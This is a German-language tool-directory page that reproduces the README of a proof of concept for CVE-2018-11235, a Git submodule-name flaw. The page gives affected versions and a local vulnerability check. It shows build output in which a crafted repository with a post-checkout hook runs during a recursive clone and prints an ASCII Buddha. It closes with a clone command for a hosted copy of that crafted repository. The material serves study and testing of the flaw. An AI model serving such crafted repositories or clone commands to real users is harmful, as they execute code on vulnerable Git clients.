Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-11235 — CVE-2018-11235(PoC && Exp) | Kitploit
Tools/GitHubGitHub/anonymking/cve-2018-11235
SchwachstellenanalyseExploitationLieferkettensicherheitLernen & BildungBinary-ExploitationLabs & Praxis
GitHubanonymking/cve-2018-11235

CVE-2018-11235

CVE-2018-11235(PoC && Exp)

Repository anzeigen
1vor 7 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-11235

Schwachstellenübersicht

  • Schwachstellenname: Git-Sicherheitslücke
  • CNNVD-Nummer: CNNVD-201805-1020
  • Bedrohungsgrad: Hoch
  • CVE-Nummer: CVE-2018-11235
  • Schwachstellentyp: Problem mit Sicherheitsmerkmalen
  • Veröffentlichungsdatum: 2018-05-31
  • Bedrohungstyp: Remote
  • Aktualisierungsdatum: 2019-04-01
  • Hersteller: git-scm
  • Schwachstellenquelle:
  • Beschreibung: Git ist ein kostenloses, quelloffenes, verteiltes Versionskontrollsystem, das von Linus Torvalds, einem US-amerikanischen Softwareentwickler, entwickelt wurde. In Git gibt es eine Sicherheitslücke, die darauf zurückzuführen ist, dass beim Hinzufügen von Submodulnamen zum Verzeichnis $GIT_DIR/modules die Submodulnamen aus nicht vertrauenswürdigen .gitmodules-Dateien nicht ordnungsgemäß validiert werden. Ein entfernter Angreifer kann diese Sicherheitslücke mit einer speziell gestalteten .gitmodules-Datei ausnutzen, um beliebigen Code auszuführen. Die folgenden Versionen sind betroffen: Git vor 2.13.7, 2.14.x vor 2.14.4, 2.15.x vor 2.15.2, 2.16.x vor 2.16.4, 2.17.x vor 2.17.1.
  • Betroffene Versionen (Quelle: „Erkennung und Behebung der Git-Exploit-Sicherheitslücke (CVE-2018-11235)“):
root@kitploit:~
Versionen 2.13.x, kleiner als 2.13.7 sind anfällig
Versionen 2.14.x, kleiner als 2.14.4 sind anfällig
Versionen 2.15.x, kleiner als 2.15.2 sind anfällig
Versionen 2.16.x, kleiner als 2.16.4 sind anfällig
Versionen 2.17.x, kleiner als 2.17.1 sind anfällig
  • Überprüfen, ob Ihre eigene Version betroffen ist (Quelle: „Erkennung und Behebung der Git-Exploit-Sicherheitslücke (CVE-2018-11235)“):
root@kitploit:~
mkdir tmp && cd tmp
git init test && cd test && git update-index --add --cacheinfo 120000,e69de29bb2d1d6434b8b29ae775ad8c2e48c5391,.gitmodules
  1. Wenn „Initialized empty Git repository in /tmp/test/.git/" angezeigt wird, ist die Sicherheitslücke vorhanden.
  2. Wenn die folgenden Sätze angezeigt werden, ist die Version nicht betroffen:
root@kitploit:~
Initialized empty Git repository in /tmp/test/.git/
error: Invalid path '.gitmodules'
fatal: git update-index: --cacheinfo cannot add .gitmodules

Nachstellung der Sicherheitslücke

  • Aufgrund der Sicherheitsmechanismen von Github können keine bösartigen Projekte hochgeladen werden. Daher können Sie das Skript build.sh ausführen, um dieses Projekt lokal zu erstellen und zu testen.
  • Die Implementierung dieses Projekts bezieht sich hauptsächlich auf die beiden Projekte CVE-2018-11235-DEMO und CVE-2018-11235.
  • Die von mir verwendete Git-Version ist git-2.12.1.
  • Der Ablauf und das Ergebnis sind wie folgt:
root@kitploit:~
[anonymking@localhost test]$ ./build.sh 
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule/.git/
[master (root-commit) 9bb1fad] submodule
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 hgt_blank
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/.git/
Cloning into '/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/payload'...
done.
Cloning into '/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/Submodule'...
done.
[master (root-commit) fcbf40f] CVE-2018-11235
 29 files changed, 560 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 Submodule
 create mode 100644 modules/1/2/3/4/payload/HEAD
 create mode 100644 modules/1/2/3/4/payload/config
 create mode 100644 modules/1/2/3/4/payload/description
 create mode 100755 modules/1/2/3/4/payload/hooks/applypatch-msg.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/commit-msg.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/post-checkout
 create mode 100755 modules/1/2/3/4/payload/hooks/post-update.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-applypatch.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-commit.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-push.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-rebase.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-receive.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/prepare-commit-msg.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/update.sample
 create mode 100644 modules/1/2/3/4/payload/index
 create mode 100644 modules/1/2/3/4/payload/info/exclude
 create mode 100644 modules/1/2/3/4/payload/logs/HEAD
 create mode 100644 modules/1/2/3/4/payload/logs/refs/heads/master
 create mode 100644 modules/1/2/3/4/payload/logs/refs/remotes/origin/HEAD
 create mode 100644 modules/1/2/3/4/payload/objects/0e/6d9b98b3face913a8ebf48f804d6c8fffba674
 create mode 100644 modules/1/2/3/4/payload/objects/9b/b1fad6c6e16340496f2cc0fec46c8159bfc693
 create mode 100644 modules/1/2/3/4/payload/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391
 create mode 100644 modules/1/2/3/4/payload/packed-refs
 create mode 100644 modules/1/2/3/4/payload/refs/heads/master
 create mode 100644 modules/1/2/3/4/payload/refs/remotes/origin/HEAD
 create mode 120000 modules/payload
 create mode 160000 payload
git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC" des_dir
[anonymking@localhost test]$ 
[anonymking@localhost test]$ 
[anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC" test
Cloning into 'test'...
done.
Submodule 'Submodule' (/home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule) registered for path 'Submodule'
Submodule '../../modules/payload' (/home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule) registered for path 'payload'
Cloning into '/home/anonymking/Desktop/test/test/Submodule'...
done.
Submodule path 'Submodule': checked out '9bb1fad6c6e16340496f2cc0fec46c8159bfc693'


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '<  `.___\_<|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Submodule path 'payload': checked out '9bb1fad6c6e16340496f2cc0fec46c8159bfc693'
  • Der von mir in der Nutzlast erstellte schädliche Code gibt einen Buddha aus. Das Erscheinen des Buddha bedeutet daher, dass der Test erfolgreich war.

Referenzen

  1. http://lkml.iu.edu/hypermail/linux/kernel/1805.3/05909.html
  2. https://www.anquanke.com/post/id/146909
  3. https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/
  4. https://xz.aliyun.com/t/2371
  5. https://github.com/CHYbeta/CVE-2018-11235-DEMO
  6. https://atorralba.github.io/CVE-2018-11235/
  7. https://github.com/Rogdham/CVE-2018-11235

Überraschende Entdeckung

  • Überraschenderweise konnte ich dieses Projekt auf Coding erfolgreich aufbauen – CVE-2018-11235.
  • Verwendung:
root@kitploit:~
git clone --recursive https://git.dev.tencent.com/anonymking/CVE-2018-11235.git test
Tool herunterladen